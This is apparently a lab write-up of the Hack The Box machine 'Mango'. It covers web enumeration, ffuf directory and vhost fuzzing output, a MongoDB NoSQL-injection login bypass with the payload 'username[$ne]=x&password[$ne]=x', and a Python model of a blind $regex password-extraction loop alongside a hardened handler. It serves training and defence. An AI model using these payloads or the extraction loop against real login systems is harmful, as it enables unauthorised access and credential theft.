Web


Nmap discovered a web server on the target's port 80. The running service is Apache httpd 2.4.29.

Both 10.10.10.162 and mango.htb return a 403 on port 80.

However, there is an active web app on the staging-order.mango.htb host. It is a login page to what appears to be an online retailer for mangoes. The Forgot Password button is not functional.

Wappalyzer revealed that the web app is written in PHP.

Authentication


Authentication sends out a POST request with the credential data.

I have tried the basic SQLi authentication bypass, but it did not work.

As the target web app appears to be written in PHP, I tried type confusion, which also failed.

NoSQLi


NoSQL injection is an authentication bypass technique against NoSQL backends. Because the payload relies on MongoDB query operators being smuggled in through the login fields, it would only work if the backend DB is MongoDB.

It worked: I am being redirected to the /home.php file. This confirms that the backend DB is MongoDB.

The end result, however, is rather unrewarding, as the /home.php file appears to be a static page.

The catch here is that I might still be able to leverage the discovered vulnerability to exfiltrate user data directly from the backend MongoDB.
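As an added example (not code from this writeup or from the target application), the following Python model covers both the bypass above and the follow-on data extraction. It mimics how PHP decodes `username[$ne]=x` into an array that the MongoDB driver treats as a query operator, shows the vulnerable login handler beside a hardened one that only accepts plain strings, and then turns the same flaw into a boolean-based blind `$regex` extraction loop. The user records, field names, handler functions and the in-memory matcher are assumptions for illustration only, not the box's real collection or code.

```python
import re
import string
from urllib.parse import parse_qsl, urlencode

# Constructed sample collection; these are NOT the box's real users or passwords.
USERS = [
    {"username": "admin", "password": "t0ps3cr3t!"},
    {"username": "mango", "password": "fruit-salad"},
]


def parse_php_form(body: str) -> dict:
    """Decode a form body the way PHP does: `user[$ne]=x` becomes
    $_POST['user'] == ['$ne' => 'x'], which the Mongo driver then treats
    as a query operator instead of a literal string."""
    params = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"([^\[]+)\[([^\]]*)\]", key)
        if m:
            params.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            params[key] = value
    return params


def matches(doc_value: str, cond) -> bool:
    """Minimal MongoDB matcher: a plain value means equality, a dict is a
    set of operators. Only $ne and $regex are modelled (Python re, not PCRE)."""
    if not isinstance(cond, dict):
        return doc_value == cond
    for op, arg in cond.items():
        if op == "$ne" and doc_value == arg:
            return False
        if op == "$regex" and not re.search(arg, doc_value):
            return False
        if op not in ("$ne", "$regex"):
            raise ValueError(f"unsupported operator {op}")
    return True


def find_user(query: dict, users=USERS):
    """Stand-in for collection.find_one(query)."""
    for doc in users:
        if all(matches(doc[field], cond) for field, cond in query.items()):
            return doc
    return None


def login(body: str, users=USERS):
    """Vulnerable handler: the decoded form goes straight into the query.
    Returns the matched username (the real app redirects to /home.php)."""
    form = parse_php_form(body)
    doc = find_user({"username": form.get("username"),
                     "password": form.get("password")}, users)
    return doc["username"] if doc else None


def login_hardened(body: str, users=USERS):
    """Fixed handler: refuse anything that is not a plain string, so
    operator objects never reach the query."""
    form = parse_php_form(body)
    user, pw = form.get("username"), form.get("password")
    if not isinstance(user, str) or not isinstance(pw, str):
        return None
    doc = find_user({"username": user, "password": pw}, users)
    return doc["username"] if doc else None


def extract_password(username: str, oracle, alphabet=string.printable) -> str:
    """Boolean-based blind extraction: extend an anchored $regex prefix one
    character at a time, using login success/failure as the oracle."""
    known = ""
    while True:
        for ch in alphabet:
            candidate = known + ch
            body = urlencode({"username": username,
                              "password[$regex]": "^" + re.escape(candidate)})
            if oracle(body):
                known = candidate
                break
        else:
            # no character extends the prefix, so the full value is recovered
            return known


if __name__ == "__main__":
    # operator injection: both fields become {"$ne": "x"} and match any user
    print(login("username[$ne]=x&password[$ne]=x"))           # admin
    print(login_hardened("username[$ne]=x&password[$ne]=x"))  # None
    # turn the same flaw into a data leak, one character per batch of requests
    print(extract_password("admin", lambda b: login(b) is not None))  # t0ps3cr3t!
```

Against the real target the oracle would be the HTTP response instead of a return value (a 302 to /home.php on success versus the login page on failure), and the `^prefix` anchor is what keeps each step to at most one request per alphabet character. MongoDB evaluates `$regex` with PCRE rather than Python's `re`, so characters with regex meaning still have to be escaped on the way out, as `re.escape` does here.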

Fuzzing


┌──(kali㉿kali)-[~/archive/htb/labs/mango]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://staging-order.mango.htb/FUZZ -ic -e .txt,.php
________________________________________________
 :: Method           : GET
 :: URL              : http://staging-order.mango.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
 :: Extensions       : .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 97ms]
    * FUZZ: home.php
 
[Status: 200, Size: 4022, Words: 447, Lines: 210, Duration: 4047ms]
    * FUZZ: index.php
 
[Status: 301, Size: 335, Words: 20, Lines: 10, Duration: 96ms]
    * FUZZ: vendor
 
[Status: 403, Size: 288, Words: 20, Lines: 10, Duration: 113ms]
    * FUZZ: server-status
 
:: Progress: [3821460/3821460] :: Job [1/1] :: 351 req/sec :: Duration: [2:40:47] :: Errors: 0 ::

Fuzzing staging-order.mango.htb finds the home.php file, which was the page that I was redirected to after bypassing the authentication. The scan also returns a 301 for vendor, which in a PHP app usually holds Composer dependencies, and the default Apache server-status endpoint (403).

┌──(kali㉿kali)-[~/archive/htb/labs/mango]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://$IP/FUZZ -ic -e .txt,.php
________________________________________________
 :: Method           : GET
 :: URL              : http://10.10.10.162/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
 :: Extensions       : .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 90ms]
    * FUZZ: server-status
 
:: Progress: [3821460/3821460] :: Job [1/1] :: 391 req/sec :: Duration: [2:40:02] :: Errors: 0 ::
 
 
┌──(kali㉿kali)-[~/archive/htb/labs/mango]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://mango.htb/FUZZ -ic -e .txt,.php
________________________________________________
 :: Method           : GET
 :: URL              : http://mango.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
 :: Extensions       : .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 96ms]
    * FUZZ: server-status
 
:: Progress: [3821460/3821460] :: Job [1/1] :: 384 req/sec :: Duration: [2:39:40] :: Errors: 0 ::

Nothing: on both the bare IP and mango.htb the only hit is the default Apache server-status endpoint, which answers 403.

Virtual Host / Sub-domain Discovery


┌──(kali㉿kali)-[~/archive/htb/labs/mango]
└─$ ffuf -c -w /usr/share/wordlists/seclists/discovery/dns/subdomains-top1million-110000.txt -u http://$IP/ -H 'Host: FUZZ.mango.htb' -fc 403
________________________________________________
 :: Method           : GET
 :: URL              : http://10.10.10.162/
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.mango.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response status: 403
________________________________________________
:: Progress: [114441/114441] :: Job [1/1] :: 408 req/sec :: Duration: [0:05:09] :: Errors: 0 ::

Unable to find any additional virtual host. Since the default vhost answers every unknown Host header with a 403, filtering that status out (-fc 403) leaves only names that resolve to a different vhost, and none did.